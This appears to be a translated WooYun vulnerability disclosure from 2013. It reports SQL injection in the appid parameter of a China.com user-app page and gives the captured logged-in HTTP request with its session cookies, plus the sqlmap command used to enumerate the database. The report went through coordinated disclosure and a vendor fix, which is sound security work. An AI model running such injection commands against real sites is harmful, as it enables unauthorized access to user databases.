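Vulnerability summary

Bug ID: wooyun-2013-047105

Vulnerability title: SQL injection on a 中华网 (China.com) site

Vendor: 中华网 (China.com)

Reported by: 剑无名

Submitted: 2013-12-26 18:32

Fixed: 2014-02-09 18:33

Disclosed: 2014-02-09 18:33

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 12

Status: Handed over to a third-party partner organization (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]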


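Vulnerability details

Disclosure status:

2013-12-26: Details sent to the vendor; waiting for the vendor to handle them
2013-12-31: Vendor confirmed; details visible to the vendor only
2014-01-10: Details opened to core white hats and experts in related fields
2014-01-20: Details opened to regular white hats
2014-01-30: Details opened to trainee white hats
2014-02-09: Details opened to the public

Brief description:

Whoa, 中华网 is a big vendor too, so I went right ahead and submitted one.

Detailed description:

Since this is an injection that exists in the logged-in state, the request has to be captured: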

GET /apps/appdisplay.php?appid=1024 HTTP/1.1
Host: u.china.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://u.china.com/photo/?_a=upload
Cookie: vjuids=337db4518.1432e49d17b.0.d9c66b3aae2328; vjlast=1388051026.1388051026.30; nickname=gainover; bindMobile=0@; CP_USER=iySF1rmQ45HNopM0nb3fhmTeDapm8Mi6zIpsuaQNIsLAKS-dJOxxUxhIdlV8wKN7NyChh20yep79eRMzwp1sblaRu1ga%2FYRnwoceuXshD3vyzWCDTZTS28y49-Dp0ddO0utjBCu7RHXQa50F6CqShLOrm9WqW-H7I6delCrdVyyy7MvRZMAmEiuSoRIyRV82fUda6HJVQ4pz2Lbla%2FsCjp2kSeFTQfxXmlLJ6WjemIAiC44IuLq2ow%3D%3D; CP_USERINFO=XPSgpSN8qpvtfhRe4iMyqiw5cK-771d%2FMfxGjYOOzpQ%2FCfDvh4cl%2FmDp6IZyLRinJueXkUC3gLWVPArzV8xUYSAXQvSHCSoLSAoaJgJ6BpaGLWR2kbEN20GsgmIM8GzyHkyr0o7tJc9c9KClI3yqm-fW0GJZNc3Pt8d0bGS2gLAx%2FEaNg47OlHIsABTLKcpHw9sf62kxGiSqsIw%2FPXDnvsy49-Dp0ddOqsQdBf4bEuL7OQs9lCPkpc0n-ni7rmD13jFKSRv19v2NyWJ5gDkfNZ9kP7lGrkyJ8glMiLpoHXgyqW9wAjnfpw%3D%3D; CP_USERSCORE=7zksgJwhJRB9SRBISFsdOk01s5-pOqSMkKRy2mYSdTd0JJ7dOENvccevdYmUJhGP%2F1sU81ghyZQvRW7kRTRa%2F2VlKw8R-pJZzcPUptRZyaFezc4F1uFw5X-grxu%2FKcpVL4OX72wUC7yTnUDPFO8vndwsy2e0V4sxOXkCc8j9jdn9pk8ZXBlUZg%3D%3D; CP_BLOG=%2520%26%2520%26%2520%26%2520%26%2520%264fae9fb4cd7fc658f95844e51d8fbda0; ExistRegister=48brjY3WUEk=; china_variable=jpEe7N32pYwL3PdnymLaHF9WbNhnVCnHKFQ/JQEhnVURSC4YjLrL9TBREfj5txq/RQBsuVVBzYjaVVg2itMgsI1yJyabyhcBQu2t-NJrcw0=; sns_cp_user=iySF1rmQ45HNopM0nb3fhmTeDapm8Mi6zIpsuaQNIsLAKS-dJOxxUxhIdlV8wKN7NyChh20yep79eRMzwp1sblaRu1ga%2FYRnwoceuXshD3vyzWCDTZTS28y49-Dp0ddO0utjBCu7RHXQa50F6CqShLOrm9WqW-H7I6delCrdVyyy7MvRZMAmEiuSoRIyRV82fUda6HJVQ4pz2Lbla%2FsCjp2kSeFTQfxXmlLJ6WjemIAiC44IuLq2ow%3D%3D; sns_login_date=2013-12-26; sns_uid=10702650; sns_hash=4069c79ad53ba569055fc929ddf11881; sns_imhash=NLoZQ8u0aHBi2aiTYYYViRaNdo90%252FtJoU1BSa9gV51O%252FsyA0kZoYKDFib4AI%252FqGPjw6q5KfTSQ8%253D; PHPSESSID=jujebdp52up49m4edc5ig9f645
Connection: keep-alive
Cache-Control: max-age=0


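Er Ge has always been my idol, so I have been testing with the name gainover all along. If this later turns up in a leaked database dump, don't blame me!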
payload:sqlmap.py -r 1.txt --current-db

Proof of vulnerability:

[Image: QQ图片20131226180111.jpg]


Heh heh

Fix:

Copyright notice: when reposting, please credit the source 剑无名@乌云


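Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 10

Confirmed: 2013-12-31 09:12

Vendor reply:

CNVD confirmed and reproduced the situation described, and CNVD has directly notified the leadership and staff of 中华网's IT department (a contact channel had been established previously).

Latest status:

None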
